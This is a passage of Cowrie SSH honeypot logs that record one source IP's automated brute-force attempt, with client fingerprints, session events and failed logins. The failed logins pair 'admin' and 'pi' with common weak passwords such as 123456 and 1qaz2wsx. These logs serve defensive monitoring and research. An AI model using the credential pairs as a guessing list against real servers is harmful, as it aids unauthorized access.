98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-26T01:53:51.138758Z","src_ip":"87.120.191.13","session":"fa70a0bf88c0"}
{"eventid":"cowrie.login.failed","username":"pi","password":"123","message":"login attempt [pi/123] failed","sensor":"my-vps","timestamp":"2025-08-26T01:53:51.200399Z","src_ip":"87.120.191.13","session":"fa70a0bf88c0"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:53:52.086619Z","src_ip":"87.120.191.13","session":"9043e19523b4"}
{"eventid":"cowrie.session.connect","src_ip":"87.120.191.13","src_port":35242,"dst_ip":"1.2.3.4","dst_port":22,"session":"6aaca485a7b3","protocol":"ssh","message":"New connection: 87.120.191.13:35242 (1.2.3.4:22) [session: 6aaca485a7b3]","sensor":"my-vps","timestamp":"2025-08-26T01:53:52.105924Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T01:53:52.106852Z","src_ip":"87.120.191.13","session":"6aaca485a7b3"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-26T01:53:52.128149Z","src_ip":"87.120.191.13","session":"6aaca485a7b3"}
{"eventid":"cowrie.login.failed","username":"admin","password":"Asdf1234","message":"login attempt [admin/Asdf1234] failed","sensor":"my-vps","timestamp":"2025-08-26T01:53:52.192455Z","src_ip":"87.120.191.13","session":"6aaca485a7b3"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:53:52.223184Z","src_ip":"87.120.191.13","session":"fa70a0bf88c0"}
{"eventid":"cowrie.session.connect","src_ip":"87.120.191.13","src_port":35258,"dst_ip":"1.2.3.4","dst_port":22,"session":"3c3de19018d9","protocol":"ssh","message":"New connection: 87.120.191.13:35258 (1.2.3.4:22) [session: 3c3de19018d9]","sensor":"my-vps","timestamp":"2025-08-26T01:53:52.244006Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T01:53:52.244853Z","src_ip":"87.120.191.13","session":"3c3de19018d9"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-26T01:53:52.269835Z","src_ip":"87.120.191.13","session":"3c3de19018d9"}
{"eventid":"cowrie.login.failed","username":"pi","password":"Asdf1234","message":"login attempt [pi/Asdf1234] failed","sensor":"my-vps","timestamp":"2025-08-26T01:53:52.334636Z","src_ip":"87.120.191.13","session":"3c3de19018d9"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:53:53.255837Z","src_ip":"87.120.191.13","session":"6aaca485a7b3"}
{"eventid":"cowrie.session.connect","src_ip":"87.120.191.13","src_port":44948,"dst_ip":"1.2.3.4","dst_port":22,"session":"6b7e55c2edf9","protocol":"ssh","message":"New connection: 87.120.191.13:44948 (1.2.3.4:22) [session: 6b7e55c2edf9]","sensor":"my-vps","timestamp":"2025-08-26T01:53:53.314424Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T01:53:53.324269Z","src_ip":"87.120.191.13","session":"6b7e55c2edf9"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-26T01:53:53.358558Z","src_ip":"87.120.191.13","session":"6b7e55c2edf9"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:53:53.370329Z","src_ip":"87.120.191.13","session":"3c3de19018d9"}
{"eventid":"cowrie.session.connect","src_ip":"87.120.191.13","src_port":44960,"dst_ip":"1.2.3.4","dst_port":22,"session":"ca047d09e6fa","protocol":"ssh","message":"New connection: 87.120.191.13:44960 (1.2.3.4:22) [session: ca047d09e6fa]","sensor":"my-vps","timestamp":"2025-08-26T01:53:53.408253Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T01:53:53.420331Z","src_ip":"87.120.191.13","session":"ca047d09e6fa"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-26T01:53:53.455495Z","src_ip":"87.120.191.13","session":"ca047d09e6fa"}
{"eventid":"cowrie.login.failed","username":"admin","password":"1","message":"login attempt [admin/1] failed","sensor":"my-vps","timestamp":"2025-08-26T01:53:53.467297Z","src_ip":"87.120.191.13","session":"6b7e55c2edf9"}
{"eventid":"cowrie.login.failed","username":"pi","password":"1","message":"login attempt [pi/1] failed","sensor":"my-vps","timestamp":"2025-08-26T01:53:53.586968Z","src_ip":"87.120.191.13","session":"ca047d09e6fa"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:53:54.525274Z","src_ip":"87.120.191.13","session":"6b7e55c2edf9"}
{"eventid":"cowrie.session.connect","src_ip":"87.120.191.13","src_port":44970,"dst_ip":"1.2.3.4","dst_port":22,"session":"becb8f800e09","protocol":"ssh","message":"New connection: 87.120.191.13:44970 (1.2.3.4:22) [session: becb8f800e09]","sensor":"my-vps","timestamp":"2025-08-26T01:53:54.564207Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T01:53:54.601549Z","src_ip":"87.120.191.13","session":"becb8f800e09"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-26T01:53:54.602228Z","src_ip":"87.120.191.13","session":"becb8f800e09"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:53:54.643622Z","src_ip":"87.120.191.13","session":"ca047d09e6fa"}
{"eventid":"cowrie.session.connect","src_ip":"87.120.191.13","src_port":44978,"dst_ip":"1.2.3.4","dst_port":22,"session":"6aab8e985263","protocol":"ssh","message":"New connection: 87.120.191.13:44978 (1.2.3.4:22) [session: 6aab8e985263]","sensor":"my-vps","timestamp":"2025-08-26T01:53:54.687444Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T01:53:54.732950Z","src_ip":"87.120.191.13","session":"6aab8e985263"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-26T01:53:54.733771Z","src_ip":"87.120.191.13","session":"6aab8e985263"}
{"eventid":"cowrie.login.failed","username":"admin","password":"1qaz2wsx","message":"login attempt [admin/1qaz2wsx] failed","sensor":"my-vps","timestamp":"2025-08-26T01:53:54.854983Z","src_ip":"87.120.191.13","session":"becb8f800e09"}
{"eventid":"cowrie.login.failed","username":"pi","password":"1qaz2wsx","message":"login attempt [pi/1qaz2wsx] failed","sensor":"my-vps","timestamp":"2025-08-26T01:53:55.009062Z","src_ip":"87.120.191.13","session":"6aab8e985263"}
{"eventid":"cowrie.session.closed","duration":"1.4","message":"Connection lost after 1.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:53:55.928538Z","src_ip":"87.120.191.13","session":"becb8f800e09"}
{"eventid":"cowrie.session.connect","src_ip":"87.120.191.13","src_port":44982,"dst_ip":"1.2.3.4","dst_port":22,"session":"dafce491e50d","protocol":"ssh","message":"New connection: 87.120.191.13:44982 (1.2.3.4:22) [session: dafce491e50d]","sensor":"my-vps","timestamp":"2025-08-26T01:53:55.959720Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T01:53:56.011824Z","src_ip":"87.120.191.13","session":"dafce491e50d"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-26T01:53:56.012521Z","src_ip":"87.120.191.13","session":"dafce491e50d"}
{"eventid":"cowrie.session.closed","duration":"1.4","message":"Connection lost after 1.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:53:56.100076Z","src_ip":"87.120.191.13","session":"6aab8e985263"}
{"eventid":"cowrie.session.connect","src_ip":"87.120.191.13","src_port":44984,"dst_ip":"1.2.3.4","dst_port":22,"session":"7fd04d9bab76","protocol":"ssh","message":"New connection: 87.120.191.13:44984 (1.2.3.4:22) [session: 7fd04d9bab76]","sensor":"my-vps","timestamp":"2025-08-26T01:53:56.131654Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T01:53:56.177640Z","src_ip":"87.120.191.13","session":"7fd04d9bab76"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-26T01:53:56.178407Z","src_ip":"87.120.191.13","session":"7fd04d9bab76"}
{"eventid":"cowrie.login.failed","username":"admin","password":"123456789","message":"login attempt [admin/123456789] failed","sensor":"my-vps","timestamp":"2025-08-26T01:53:56.324528Z","src_ip":"87.120.191.13","session":"dafce491e50d"}
{"eventid":"cowrie.login.failed","username":"pi","password":"123456789","message":"login attempt [pi/123456789] failed","sensor":"my-vps","timestamp":"2025-08-26T01:53:56.515951Z","src_ip":"87.120.191.13","session":"7fd04d9bab76"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:53:57.476841Z","src_ip":"87.120.191.13","session":"dafce491e50d"}
{"eventid":"cowrie.session.connect","src_ip":"87.120.191.13","src_port":44992,"dst_ip":"1.2.3.4","dst_port":22,"session":"8e384befce76","protocol":"ssh","message":"New connection: 87.120.191.13:44992 (1.2.3.4:22) [session: 8e384befce76]","sensor":"my-vps","timestamp":"2025-08-26T01:53:57.601887Z"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:53:57.775096Z","src_ip":"87.120.191.13","session":"7fd04d9bab76"}
{"eventid":"cowrie.session.connect","src_ip":"87.120.191.13","src_port":45000,"dst_ip":"1.2.3.4","dst_port":22,"session":"fdf7eb869803","protocol":"ssh","message":"New connection: 87.120.191.13:45000 (1.2.3.4:22) [session: fdf7eb869803]","sensor":"my-vps","timestamp":"2025-08-26T01:53:57.899741Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T01:53:57.921403Z","src_ip":"87.120.191.13","session":"8e384befce76"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-26T01:53:57.922706Z","src_ip":"87.120.191.13","session":"8e384befce76"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T01:53:58.339294Z","src_ip":"87.120.191.13","session":"fdf7eb869803"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-26T01:53:58.340103Z","src_ip":"87.120.191.13","session":"fdf7eb869803"}
{"eventid":"cowrie.login.failed","username":"admin","password":"123456","message":"login attempt [admin/123456] failed","sensor":"my-vps","timestamp":"2025-08-26T01:53:59.350028Z","src_ip":"87.120.191.13","session":"8e384befce76"}
{"eventid":"cowrie.login.failed","username":"pi","password":"123456","message":"login attempt [pi/123456] failed","sensor":"my-vps","timestamp":"2025-08-26T01:53:59.472744Z","src_ip":"87.120.191.13","session":"fdf7eb869803"}
